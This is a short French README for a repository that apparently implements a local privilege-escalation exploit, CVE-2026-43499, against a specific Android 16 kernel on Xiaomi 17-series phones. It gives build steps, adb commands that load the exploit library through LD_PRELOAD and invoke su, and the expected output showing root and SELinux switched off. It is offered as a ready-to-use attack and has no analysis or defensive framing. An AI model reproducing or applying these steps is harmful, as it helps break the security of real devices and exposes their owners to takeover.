
CVE-2026-43499 Implémentation pour 6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
popsicleCe dépôt contient l'implémentation de l'escalade de privilèges locaux CVE-2026-43499 sur Android 16 pour le Xiaomi 17 Pro Max (popsicle). Noyau vérifié :
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
Les modèles Xiaomi 17, Pro et Ultra utilisant ce noyau ont tous été vérifiés comme fonctionnels.
Dépendances : Python 3 et llvm-objdump :
python3 generate_target.py \
--boot boot.img \
--xbl-config xbl_config.img \
-o source/src/target.h
make -C source clean preload
Si le NDK n'est pas détecté automatiquement :
NDK_ROOT=/path/to/android-ndk make -C source clean preload
Produit final :
source/build/bin/preload.so
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
En cas de succès, on voit :
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
Après exploitation, l'écran s'allume, se déverrouille et le bureau apparaît, mais les nouvelles applications Android ne peuvent pas terminer leur initialisation du Framework et crashent ; après un redémarrage, les applications se lancent normalement.